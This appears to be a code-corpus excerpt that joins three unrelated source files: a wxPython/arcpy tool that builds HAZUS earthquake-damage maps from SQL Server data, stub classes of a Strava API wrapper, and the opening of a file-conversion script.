self.hazus_db_list = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your Study Region")
self.hazus_db_list.SetFont(normal_font)
database_box.Add(self.hazus_db_list)
database_box.Add(wx.Size(20, 10))
self.db_choices = ["Study Region 1", "Study Region 2"]
self.db_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.db_choices, size=wx.Size(300, -1))
self.db_list.SetFont(normal_font)
database_box.Add(self.db_list)
self.hazus_db = ""
self.db_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_db)
# the create maps box
self.create_maps_staticbox = wx.StaticBox(self.main_panel, -1, "Choose your maps", size=wx.Size(-1, -1))
self.create_maps_staticbox.SetFont(normal_font)
self.create_maps_staticbox.SetOwnFont(label_font)
create_maps_sizer = wx.StaticBoxSizer(self.create_maps_staticbox, orient=wx.HORIZONTAL)
maps_to_select_box = wx.BoxSizer(wx.VERTICAL)
map_selection_buttons = wx.BoxSizer(wx.VERTICAL)
selected_maps_box = wx.BoxSizer(wx.VERTICAL)
# add the three vertical sizers to the horizontal container sizer
create_maps_sizer.Add(maps_to_select_box)
create_maps_sizer.Add(map_selection_buttons, 0, wx.ALL | wx.CENTER, 30)
create_maps_sizer.Add(selected_maps_box)
# add static text and a list box to the maps to select sizer
self.map_selection_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Select the maps to create")
self.map_selection_label.SetFont(normal_font)
maps_to_select_box.Add(self.map_selection_label)
maps_to_select_box.Add(wx.Size(20, 10))
# Create a list box with all of the potential maps that the user can select
self.map_choices = ["Direct Economic Loss", "Shelter Needs", "Utility Damage",
"Building Inspection Needs", "Estimated Debris",
"Highway Infrastructure Damage", "Impaired Hospitals", "Water Infrastructure Damage",
"Search and Rescue Needs"]
self.map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, choices=self.map_choices, size=wx.Size(-1, -1), style=wx.LB_EXTENDED | wx.LB_SORT)
self.map_list.SetFont(normal_font)
maps_to_select_box.Add(self.map_list)
maps_to_select_size = self.map_list.GetSize()
# add buttons for the user to add and remove maps from the current selection
self.add_maps_to_selection = wx.Button(self.create_maps_staticbox, label="Add -->", size=wx.Size(-1, -1))
self.add_maps_to_selection.SetFont(normal_font)
self.remove_maps_from_selection = wx.Button(self.create_maps_staticbox, label="Remove <--", size=wx.Size(-1, -1))
self.remove_maps_from_selection.SetFont(normal_font)
map_selection_buttons.Add(self.add_maps_to_selection)
map_selection_buttons.Add(wx.Size(20, 10))
map_selection_buttons.Add(self.remove_maps_from_selection)
self.add_maps_to_selection.Bind(wx.EVT_BUTTON, self.select_maps)
self.remove_maps_from_selection.Bind(wx.EVT_BUTTON, self.deselect_maps)
# add static text and a list box to the selected maps sizer
self.selected_map_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Selected maps")
self.selected_map_label.SetFont(normal_font)
selected_maps_box.Add(self.selected_map_label)
selected_maps_box.Add(wx.Size(20, 10))
self.selected_map_choices = []
self.selected_maps = []
self.selected_map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, style=wx.LB_EXTENDED | wx.LB_SORT, choices=self.selected_map_choices, size=maps_to_select_size)
self.selected_map_list.SetFont(normal_font)
selected_maps_box.Add(self.selected_map_list)
self.deselect_map_choices = []
self.map_extent = {}
# Disable the map selection lists until the user selects a server and a database
self.map_list.Disable()
self.selected_map_list.Disable()
# create a horizontal sizer to hold the Go and Reset buttons
primary_button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# add in the buttons
self.create_maps = wx.Button(self.main_panel, label="Go!", size=wx.Size(150, 100))
self.create_maps.SetFont(label_font)
self.create_maps.SetBackgroundColour(wx.Colour(44,162,95))
primary_button_sizer.Add(self.create_maps, 0, wx.ALL, 20)
self.Bind(wx.EVT_BUTTON, self.copy_template, self.create_maps)
# Create a button that resets the form
self.reset_button = wx.Button(self.main_panel, label="Reset", size=wx.Size(150, 100))
self.reset_button.SetFont(label_font)
primary_button_sizer.Add(self.reset_button, 0, wx.ALL, 20)
# self.Bind(wx.EVT_BUTTON, self.OnReset, self.resetButton)
box.Add(welcome_sizer, 0.5, wx.EXPAND)
box.Add(output_directory_sizer, 0.5, wx.EXPAND)
box.Add(server_and_db_sizer, 0.5, wx.EXPAND)
box.Add(create_maps_sizer, 2, wx.EXPAND)
box.Add(primary_button_sizer, 1, wx.EXPAND)
# Set the panel to be the same size as the main sizer, then set the frame to be the
# same size as the panel
self.main_panel.SetSizerAndFit(box)
panel_size = self.main_panel.GetSize()
self.SetSize(panel_size)
# 2. Select output directory
def select_output_directory(self, event):
"""This function allows the user to choose an output directory and then generates a list
of available SQL Server instances for the user to select."""
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
dlg.Show()
if dlg.ShowModal() == wx.ID_OK:
self.output_directory = dlg.GetPath()
self.sb.SetStatusText("You chose %s" % self.output_directory)
self.logger.info("Output directory: " + self.output_directory)
dlg.Destroy()
self.hazus_server_choices = sqlinstances.list_sql_servers(self)
self.hazus_server_list.Clear()
for server in self.hazus_server_choices:
self.hazus_server_list.Append(server)
self.sb.SetStatusText("Please select your HAZUS Server")
# 3. Select HAZUS SQL Server instance
def select_hazus_server(self, event):
"""This function allows the user to select a HAZUS server (SQL Server instance) from a
drop down list, and then populates a drop down list of HAZUS study regions (databases)
for the user to select."""
self.hazus_server = self.hazus_server_list.GetValue()
self.sb.SetStatusText("You chose %s" % self.hazus_server)
self.logger.info("HAZUS Server: " + str(self.hazus_server))
# Populate the drop down menu of databases in the server
cxn = pyodbc.connect('DRIVER={SQL Server};SERVER=%s;DATABASE=master;UID="hazuspuser";'
'PASSWORD="<PASSWORD>";Trusted_Connection=yes' % str(self.hazus_server))
cursor = cxn.cursor()
cursor.execute("select name from sys.databases")
rows = cursor.fetchall()
self.db_list.Clear()
for row in rows:
self.db_list.Append(row[0])
self.sb.SetStatusText("Please select your HAZUS Study Region")
cxn.close()
# 4. Select HAZUS study region (SQL Server database)
def select_hazus_db(self, event):
"""This function allows the user to select a HAZUS Study Region (SQL Server Database) from
a drop down list, then enables the user to select the set of maps to generate."""
self.hazus_db = self.db_list.GetValue()
self.sb.SetStatusText("You chose %s" % self.hazus_db)
self.logger.info("HAZUS Database: " + str(self.hazus_db))
# Enable the map selection lists
self.map_list.Enable()
self.selected_map_list.Enable()
self.sb.SetStatusText("Please choose the maps you want to create")
# 5. Choose map or maps from list of templates and add to list of maps to create
def select_maps(self, event):
"""This function allows the user to select some or all of the available maps and add them
to the list of maps to create."""
self.selected_map_choices = list(self.map_list.GetSelections())
# Add the selected maps to the selected list, and remove these selections from the
# original list so that each map can only be selected once
for s in self.selected_map_choices:
selected_map = self.map_list.GetString(s)
self.selected_maps.append(selected_map)
self.map_choices.remove(selected_map)
self.logger.info("Added " + str(selected_map) + " to selection")
self.selected_map_list.Set(self.selected_maps)
self.map_list.Set(self.map_choices)
self.sb.SetStatusText("Click Go! to create maps or adjust your selections")
def deselect_maps(self, event):
"""This function allows the user to revise the current map selection before creating the maps."""
self.deselect_map_choices = list(self.selected_map_list.GetSelections())
for d in self.deselect_map_choices:
map_to_deselect = self.selected_map_list.GetString(d)
self.map_choices.append(map_to_deselect)
self.selected_maps.remove(map_to_deselect)
self.logger.info("Removed " + str(map_to_deselect) + " from selection")
self.selected_map_list.Set(self.selected_maps)
self.map_list.Set(self.map_choices)
self.sb.SetStatusText("Click Go! if you are happy with your selections")
# 6. Run the script
# 6a. Create the directory structure in output directory
# Copy the template shakemap geodatabase to a Data folder in the
# same directory as the earthquake name
def copy_template(self, event):
"""This function copies a template study region geodatabase and the
layer files into the selected output directory."""
temp = inspect.stack()[0][1]
script_dir = temp.replace('HAZUS_Map_Automation.py', "Template")
self.scenario_dir = self.output_directory + "\\" + self.hazus_db
self.scenario_data_dir = self.scenario_dir + "\\Scenario_Data"
self.study_region_data = self.scenario_data_dir + "\\Data\\StudyRegionData.mdb"
shutil.copytree(script_dir, self.scenario_data_dir)
self.sb.SetStatusText("Copied template data and maps to " + self.scenario_data_dir)
self.logger.info("Copied template data and maps to " + self.scenario_data_dir)
output_dirs = ["Summary_Reports", "JPEG", "PDF"]
os.chdir(self.scenario_dir)
for new_dir in output_dirs:
os.mkdir(new_dir)
self.sb.SetStatusText("Created output dirs in: " + self.scenario_dir)
self.connect_to_db()
# 6.b Extract data from SQL Server
# Use pyodbc to connect to SQL Server
def connect_to_db(self):
"""This function establishes a connection to the selected HAZUS database
to extract data for the selected maps."""
connection_str = """
DRIVER={SQL Server};
SERVER=%s;
DATABASE=%s;
UID=hazuspuser;
PWD=<PASSWORD>_01""" % (self.hazus_server, self.hazus_db)
conn = pyodbc.connect(connection_str)
self.sb.SetStatusText("Established connection to: " + self.hazus_db)
self.logger.info("Established connection to: " + self.hazus_db)
cursor = conn.cursor()
maps_to_create = []
for selected_map in self.selected_maps:
self.logger.info("Selected map list includes: " + selected_map)
lower_case = selected_map.lower()
no_spaces = lower_case.replace(" ", "_")
maps_to_create.append(str(no_spaces))
self.determine_map_extent(cursor)
# Call a function to extract the data needed for each map
# For example, if building inspection needs is one of the selected maps,
# the getattr() statement below generates the following:
# getattr(self, building_inspection_needs)(), which is equivalent to:
# self.building_inspection_needs()
for m in maps_to_create:
getattr(self, m)(cursor)
cursor.close()
conn.close()
self.sb.SetStatusText("Closed connection to the HAZUS database")
def determine_map_extent(self, cursor):
"""This function accepts a cursor from pyodbc to call the SQL Server
database and queries the database for all tracts in the current study
region. These tracts are then passed to arcpy to calculate the extent
of these tracts. This extent is returned out of the function and passed
to each of the maps selected."""
study_region_tracts_sql = """
SELECT Tract FROM hzTract
"""
cursor.execute(study_region_tracts_sql)
study_region_tracts = cursor.fetchall()
tracts_to_select = []
for sr_tract in study_region_tracts:
tracts_to_select.append(sr_tract[0])
# Convert list of tracts into a string to add to a selection query
str_tracts = str(tracts_to_select)
str_tracts = str_tracts.replace("[", "")
str_tracts = str_tracts.replace("]", "")
tract_fc = mapping.Layer(self.scenario_data_dir + "\\Data\\TotalEconLoss.lyr")
out_fl = self.scenario_data_dir + "\\Data\\Selected_Tracts.lyr"
management.MakeFeatureLayer(tract_fc, "temp_lyr")
lyr = mapping.Layer("temp_lyr")
lyr.definitionQuery = "[Tract] in (" + str_tracts + ")"
lyr.saveACopy(out_fl)
selection_layer = mapping.Layer(out_fl)
# Get extent of feature layer
tract_extent = selection_layer.getExtent()
# Return extent out of function as dictionary
self.map_extent["XMin"] = tract_extent.XMin
self.map_extent["XMax"] = tract_extent.XMax
self.map_extent["YMin"] = tract_extent.YMin
self.map_extent["YMax"] = tract_extent.YMax
self.sb.SetStatusText("Determined map extent")
# 6.c Create table queries to get only the data we need
# For each possible map, create a function to call the specific data needed
def building_inspection_needs(self, cursor):
"""This function creates the building inspection needs map by querying
the eqTractDmg table in the SQL Server database."""
self.logger.info("You want to make a building inspection needs map!")
# Get the data from SQL Server
building_inspection_sql = """
SELECT Tract, Sum(PDsSlightBC) as PDsSlightBC, Sum(PDsModerateBC) as PDsModerateBC,
Sum(PDsExtensiveBC) as PDsExtensiveBC, Sum(PDsCompleteBC) as PDsCompleteBC
FROM eqTractDmg WHERE DmgMechType='STR'
GROUP BY Tract
"""
cursor.execute(building_inspection_sql)
inspection_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for ins_tract in inspection_tracts:
tract = ins_tract.Tract
slight = ins_tract.PDsSlightBC
moderate = ins_tract.PDsModerateBC
extensive = ins_tract.PDsExtensiveBC
complete = ins_tract.PDsCompleteBC
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['PDsSlightBC', 'PDsModerateBC', 'PDsExtensiveBC', 'PDsCompleteBC', 'SL_MO_TOT']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = slight
urow[1] = moderate
urow[2] = extensive
urow[3] = complete
urow[4] = slight + moderate
urows.updateRow(urow)
self.update_fc(fc, 'PDsSlightBC')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\BuildingInspectionNeeds.mxd"
map_name = "BuildingInspectionNeeds"
self.update_and_export_map(mxd, map_name)
def direct_economic_loss(self, cursor):
"""This function creates a direct economic loss map by querying the
eqTractEconLoss table in the SQL Server database."""
self.logger.info("You want to make a direct economic loss map!")
# Get the data from SQL Server
economic_loss_sql = """
SELECT Tract, Sum(TotalLoss) as TotalLoss
FROM eqTractEconLoss
GROUP BY Tract
"""
cursor.execute(economic_loss_sql)
del_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for del_tract in del_tracts:
tract = del_tract.Tract
total_econ_loss = del_tract.TotalLoss
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['TotalEconLoss']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = total_econ_loss
urows.updateRow(urow)
self.update_fc(fc, 'TotalEconLoss')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\DirectEconomicLoss.mxd"
map_name = "DirectEconomicLoss"
self.update_and_export_map(mxd, map_name)
def estimated_debris(self, cursor):
"""This function creates an estimated debris map by querying the
eqTract table in the SQL Server database."""
self.logger.info("You want to make an estimated debris map!")
# Get the data from SQL Server
debris_sql = """
SELECT Tract, DebrisS, DebrisC, DebrisTotal
FROM eqTract
"""
cursor.execute(debris_sql)
debris_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for debris_tract in debris_tracts:
tract = debris_tract.Tract
debriss = debris_tract.DebrisS
debrisc = debris_tract.DebrisC
debris_total = debris_tract.DebrisTotal
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['DebrisS', 'DebrisC', 'DebrisTotal']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = debriss
urow[1] = debrisc
urow[2] = debris_total
urows.updateRow(urow)
self.update_fc(fc, 'DebrisTotal')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\EstimatedDebris.mxd"
map_name = "EstimatedDebris"
self.update_and_export_map(mxd, map_name)
def highway_infrastructure_damage(self, cursor):
"""This function creates a highway Infrastructure damage map by querying
the eqHighwayBridge and eqHighwaySegement tables in the SQL Server database."""
self.logger.info("You want to make a highway Infrastructure damage map!")
# Get the data from SQL Server
highways_sql = """
SELECT HighwaySegID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqHighwaySegment
"""
cursor.execute(highways_sql)
highways = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqHighwaySegment table
highway_fc = self.study_region_data + "\\eqHighwaySegment"
for highway in highways:
highway_id = highway.HighwaySegID
highway_moderate = highway.PDsExceedModerate
highway_functday1 = highway.FunctDay1
highway_econ_loss = highway.EconLoss
query = '[HighwaySegID] = ' + '\'' + highway_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(highway_fc, fields, query) as urows:
for urow in urows:
urow[0] = highway_moderate
urow[1] = highway_functday1
urow[2] = highway_econ_loss
urows.updateRow(urow)
self.update_fc(highway_fc, 'PDsExceedModerate')
# Get the data from SQL Server
bridges_sql = """
SELECT HighwayBridgeID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqHighwayBridge
"""
cursor.execute(bridges_sql)
bridges = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqHighwayBridge table
bridge_fc = self.study_region_data + "\\eqHighwayBridge"
for bridge in bridges:
bridge_id = bridge.HighwayBridgeID
bridge_moderate = bridge.PDsExceedModerate
bridge_functday1 = bridge.FunctDay1
bridge_econ_loss = bridge.EconLoss
query = '[HighwayBridgeId] = ' + '\'' + bridge_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(bridge_fc, fields, query) as urows:
for urow in urows:
urow[0] = bridge_moderate
urow[1] = bridge_functday1
urow[2] = bridge_econ_loss
urows.updateRow(urow)
self.update_fc(bridge_fc, 'PDsExceedModerate')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\HighwayInfrastructureDamage.mxd"
map_name = "HighwayInfrastructureDamage"
self.update_and_export_map(mxd, map_name)
def impaired_hospitals(self, cursor):
"""This function creates an impaired hospitals map by querying the
eqCareFlty table for hospital performance data and the eqTractCasOccup
table for life threatening injury data."""
self.logger.info("You want to make an impaired hospitals map!")
# Get the data from SQL Server
hospital_sql = """
SELECT CareFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqCareFlty
"""
injury_sql = """
SELECT Tract, Sum(Level1Injury) as Level1Injury, Sum(Level2Injury) as Level2Injury,
Sum(Level3Injury) as Level3Injury, Sum(Level4Injury) as Level4Injury
FROM eqTractCasOccup
WHERE CasTime = 'D' AND InOutTot = 'TOT'
GROUP BY Tract
"""
cursor.execute(hospital_sql)
hospitals = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqCareFlty table
hospital_fc = self.study_region_data + "\\eqCareFlty"
for hospital in hospitals:
hospital_id = hospital.CareFltyID
hospital_moderate = hospital.PDsExceedModerate
hospital_functday1 = hospital.FunctDay1
hospital_econ_loss = hospital.EconLoss
query = '[CareFltyId] = ' + '\'' + hospital_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(hospital_fc, fields, query) as urows:
for urow in urows:
urow[0] = hospital_moderate
urow[1] = hospital_functday1
urow[2] = hospital_econ_loss
urows.updateRow(urow)
self.update_fc(hospital_fc, 'PDsExceedModerate')
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
cursor.execute(injury_sql)
injury_tracts = cursor.fetchall()
fc = self.study_region_data + "\\eqTract"
for injury_tract in injury_tracts:
tract = injury_tract.Tract
level1 = injury_tract.Level1Injury
level2 = injury_tract.Level2Injury
level3 = injury_tract.Level3Injury
level4 = injury_tract.Level4Injury
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['Level1Injury', 'Level2Injury', 'Level3Injury', 'Level4Injury', 'SUM_2_3']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = level1
urow[1] = level2
urow[2] = level3
urow[3] = level4
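                    # SUM_2_3 stores the combined level 2 and level 3 injury count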
urow[4] = level2 + level3
urows.updateRow(urow)
self.update_fc(fc, 'Level1Injury')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\ImpairedHospitals.mxd"
map_name = "ImpairedHospitals"
self.update_and_export_map(mxd, map_name)
def search_and_rescue_needs(self, cursor):
"""This function creates a search and rescue needs map by querying the
eqTractDmg table in the SQL Server database. Search and rescue needs are
represented by red tag (complete) damage buildings. Only a portion of these
buildings would be expected to collapse (e.g., 15 percent of URMs)."""
self.logger.info("You want to make a search and rescue needs map!")
# Get the data from SQL Server
sar_sql = """
SELECT Tract, Sum(PDsCompleteBC) as PDsCompleteBC
FROM eqTractDmg WHERE DmgMechType='STR'
GROUP BY Tract
"""
cursor.execute(sar_sql)
sar_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for sar_tract in sar_tracts:
tract = sar_tract.Tract
complete = sar_tract.PDsCompleteBC
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['PDsCompleteBC']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = complete
urows.updateRow(urow)
self.update_fc(fc, 'PDsCompleteBC')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\SearchandRescueNeeds.mxd"
map_name = "SearchandRescueNeeds"
self.update_and_export_map(mxd, map_name)
def shelter_needs(self, cursor):
"""This function creates a shelter needs map by querying the
eqTract table in the SQL Server database."""
self.logger.info("You want to make a shelter needs map!")
# Get the data from SQL Server
shelter_sql = """
SELECT Tract, ShortTermShelter, DisplacedHouseholds, ExposedPeople, ExposedValue
FROM eqTract
"""
cursor.execute(shelter_sql)
shelter_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqTract table
fc = self.study_region_data + "\\eqTract"
for shelter_tract in shelter_tracts:
tract = shelter_tract.Tract
displaced = shelter_tract.DisplacedHouseholds
shelter = shelter_tract.ShortTermShelter
exposed_people = shelter_tract.ExposedPeople
exposed_value = shelter_tract.ExposedValue
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['DisplacedHouseholds', 'ShortTermShelter', 'ExposedPeople', 'ExposedValue']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = displaced
urow[1] = shelter
urow[2] = exposed_people
urow[3] = exposed_value
urows.updateRow(urow)
self.update_fc(fc, 'DisplacedHouseholds')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\ShelterNeeds.mxd"
map_name = "ShelterNeeds"
self.update_and_export_map(mxd, map_name)
def utility_damage(self, cursor):
"""THis function creates a utility damage map by querying the
eqElectricPowerFlty, eqOilFlty and eqNaturalGasFlty tables in the
SQL Server database."""
self.logger.info("You want to make a utility damage map!")
        # Get the data from SQL Server
electric_flty_sql = """
SELECT ElectricPowerFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqElectricPowerFlty
"""
cursor.execute(electric_flty_sql)
electric_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqElectricPowerFlty table
electric_fc = self.study_region_data + "\\eqElectricPowerFlty"
for electric_facility in electric_facilities:
electric_flty_id = electric_facility.ElectricPowerFltyID
electric_flty_moderate = electric_facility.PDsExceedModerate
electric_flty_funct_day1 = electric_facility.FunctDay1
electric_flty_econ_loss = electric_facility.EconLoss
query = '[ElectricPowerFltyID] = ' + '\'' + electric_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(electric_fc, fields, query) as urows:
for urow in urows:
urow[0] = electric_flty_moderate
                    urow[1] = electric_flty_funct_day1
urow[2] = electric_flty_econ_loss
urows.updateRow(urow)
self.update_fc(electric_fc, 'PDsExceedModerate')
        # Get the data from SQL Server
natural_gas_flty_sql = """
SELECT NaturalGasFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqNaturalGasFlty
"""
cursor.execute(natural_gas_flty_sql)
natural_gas_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqNaturalGasFlty table
ng_fc = self.study_region_data + "\\eqNaturalGasFlty"
for natural_gas_facility in natural_gas_facilities:
natural_gas_flty_id = natural_gas_facility.NaturalGasFltyID
natural_gas_flty_moderate = natural_gas_facility.PDsExceedModerate
natural_gas_flty_funct_day1 = natural_gas_facility.FunctDay1
natural_gas_flty_econ_loss = natural_gas_facility.EconLoss
query = '[NaturalGasFltyID] = ' + '\'' + natural_gas_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(ng_fc, fields, query) as urows:
for urow in urows:
urow[0] = natural_gas_flty_moderate
                    urow[1] = natural_gas_flty_funct_day1
urow[2] = natural_gas_flty_econ_loss
urows.updateRow(urow)
self.update_fc(ng_fc, 'PDsExceedModerate')
        # Get the data from SQL Server
oil_flty_sql = """
SELECT OilFltyID, PDsExceedModerate, FunctDay1, EconLoss
FROM eqOilFlty
"""
cursor.execute(oil_flty_sql)
oil_facilities = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqOilFlty table
oil_fc = self.study_region_data + "\\eqOilFlty"
for oil_facility in oil_facilities:
oil_flty_id = oil_facility.OilFltyID
oil_flty_moderate = oil_facility.PDsExceedModerate
oil_flty_funct_day1 = oil_facility.FunctDay1
oil_flty_econ_loss = oil_facility.EconLoss
query = '[OilFltyID] = ' + '\'' + oil_flty_id + '\''
fields = ['PDsExceedModerate', 'FunctDay1', 'EconLoss']
with da.UpdateCursor(oil_fc, fields, query) as urows:
for urow in urows:
urow[0] = oil_flty_moderate
                    urow[1] = oil_flty_funct_day1
urow[2] = oil_flty_econ_loss
urows.updateRow(urow)
self.update_fc(oil_fc, 'PDsExceedModerate')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\UtilityDamage.mxd"
map_name = "UtilityDamage"
self.update_and_export_map(mxd, map_name)
def water_infrastructure_damage(self, cursor):
"""This function creates a potable water infrastructure damage map by
querying the eqPotableWaterDL table in the SQL Server database."""
self.logger.info("You want to make a water Infrastructure damage map!")
# Get the data from SQL Server
water_sql = """
SELECT Tract, TotalPipe, TotalNumRepairs, TotalDysRepairs, EconLoss, Cost
FROM eqPotableWaterDL
"""
cursor.execute(water_sql)
water_tracts = cursor.fetchall()
# Update the corresponding fields in the StudyRegionData.mdb\eqPotableWaterDL table
fc = self.study_region_data + "\\eqPotableWaterDL"
for water_tract in water_tracts:
tract = water_tract.Tract
total_pipe = water_tract.TotalPipe
total_repairs = water_tract.TotalNumRepairs
total_days = water_tract.TotalDysRepairs
econ_loss = water_tract.EconLoss
cost = water_tract.Cost
query = '[Tract] = ' + '\'' + tract + '\''
fields = ['TotalPipe', 'TotalNumRepairs', 'TotalDysRepairs', 'EconLoss', 'Cost']
with da.UpdateCursor(fc, fields, query) as urows:
for urow in urows:
urow[0] = total_pipe
urow[1] = total_repairs
urow[2] = total_days
urow[3] = econ_loss
urow[4] = cost
urows.updateRow(urow)
self.update_fc(fc, 'EconLoss')
# Update and export the map
mxd = self.scenario_data_dir + "\\Maps\\WaterInfrastructureDamage.mxd"
map_name = "WaterInfrastructureDamage"
self.update_and_export_map(mxd, map_name)
def update_fc(self, fc, field):
"""This function updates a feature class that removes all of the records
from the geodatabase that are not part of the study region. The fc
parameter is the feature class to update and the field parameter is the
field in the feature class that was updated with data from the HAZUS
database. Records not part of the study region will have a field value
of NULL."""
query = '[' + field + '] IS NULL'
with da.UpdateCursor(fc, '*', query) as urows:
for urow in urows:
urows.deleteRow()
# 6.d Update the template mxds with a new extent
# Map symbology should be set from the template lyr files
def update_and_export_map(self, mxd, map_name):
"""This function takes a path to an mxd on disk and a map name as input.
Using the arcpy module, it then sets the extent of the data frame to
match all of the Census Tracts in the study region. The map elements
are updated to match the author name and reflect any tabular information
contained on the map layout."""
current_map = mapping.MapDocument(mxd)
df = mapping.ListDataFrames(current_map, "Template_Data")[0]
# Set the map extent to match the one calculated in the determine_map_extent
# function. Per the ArcGIS documentation, copy the existing data frame
# extent before modifying it.
new_extent = df.extent
new_extent.XMin = self.map_extent["XMin"]
new_extent.XMax = self.map_extent["XMax"]
new_extent.YMin = self.map_extent["YMin"]
new_extent.YMax = self.map_extent["YMax"]
df.extent = new_extent
current_map.save()
self.sb.SetStatusText("Updated: " + mxd)
# 6.e Export maps as PDF and JPEG
pdf_out_dir = self.scenario_dir + "\\PDF"
jpeg_out_dir = self.scenario_dir + "\\JPEG"
mapping.ExportToPDF(current_map, pdf_out_dir + "\\" + map_name + ".pdf")
mapping.ExportToJPEG(current_map, jpeg_out_dir + "\\" + map_name + ".jpeg", resolution=200)
self.sb.SetStatusText("Exported: " + map_name)
# 7. View log files if desired
def __initlogging(self):
"""Initialize a log file to view all of the settings and error information each time
the script runs."""
self.logger = logging.getLogger("HAZUSMapCreatorLog")
self.logger.setLevel(logging.DEBUG)
# Create a file handler
ch = logging.FileHandler(self.logfile)
ch.setLevel(logging.DEBUG)
# Format the logfile entries
formatter = logging.Formatter("[%(asctime)s][%(name)s:%(lineno)d][%(levelname)s] %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
self.logger.addHandler(ch)
try:
app = wx.App()
frame = MainFrame(None)
frame.Show()
app.MainLoop()
except:
# Error handling code from ArcGIS Resource Center
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
pymsg = "PYTHON ERRORS:\nTraceback Info:\n" + tbinfo + "\nError Info:\n " + str(sys.exc_type) + ": " + str(
sys.exc_value) + "\n"
print pymsg
``` |
{
"source": "JoshGuarino/stravapy",
"score": 2
} |
#### File: stravapy/resources/routes.py
```python
from request import Request
class Routes(object):
def get_route_as_gpx():
return
    def get_route_as_tcx():
return
def get_route_by_id():
return
def get_routes_by_athlete_id():
return
```
#### File: stravapy/resources/segments.py
```python
from request import Request
class Segments(object):
def explore_segments():
return
def get_logged_in_athlete_starred_segments():
return
def get_segment_by_id():
return
def star_segment():
return
```
#### File: stravapy/resources/uploads.py
```python
from request import Request
class Uploads(object):
def create_upload():
return
def get_upload_by_id():
return
```
#### File: stravapy/stravapy/stravapy.py
```python
from resources import *
from request import Request
from oauth import Oauth
class Stravapy:
def __init__(self, access_token):
self.access_token = access_token
self.base_url = 'https://www.strava.com/api/v3'
        self.headers = { 'Authorization' : f'Bearer {access_token}' }
self.activities = activities.Activities
self.athlete = athlete.Athlete
self.clubs = clubs.Clubs
self.gear = gear.Gear
self.routes = routes.Routes
self.running_races = running_races.RunningRaces
self.segment_efforts = segment_efforts.SegmentEfforts
self.segments = segments.Segments
self.streams = streams.Streams
self.uploads = uploads.Uploads
``` |
{
"source": "joshgyn/FileConverter",
"score": 3
} |
#### File: joshgyn/FileConverter/main.py
```python
from wand.image import Image as wi
import os.path
from os import path
import argparse
def get_arguments(): # gets arguments and files from user
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", dest="file", help="File to be converted, (e.g. sample.pdf, apple.png, baseball.jpg).")
parser.add_argument("-ct" , "--convert_type", dest="convert_type", help="New file type to be converted to, (e.g. png or jpg).")
(options) = parser.parse_args()
if not options.file:
parser.error("[-] Please specify a file, use --help for more info.")
elif not options.convert_type:
parser.error("[-] Please specify a file type to be converted to, use --help for more info.")
return options
def check_file(options): # checks if the file exists and the requested conversion type is supported
try:
print(f"[+] Checking if {options.file} exsits.")
if path.exists(options.file) == True:
print(f"[+] File {options.file} found.")
file_name = options.file[:-4]
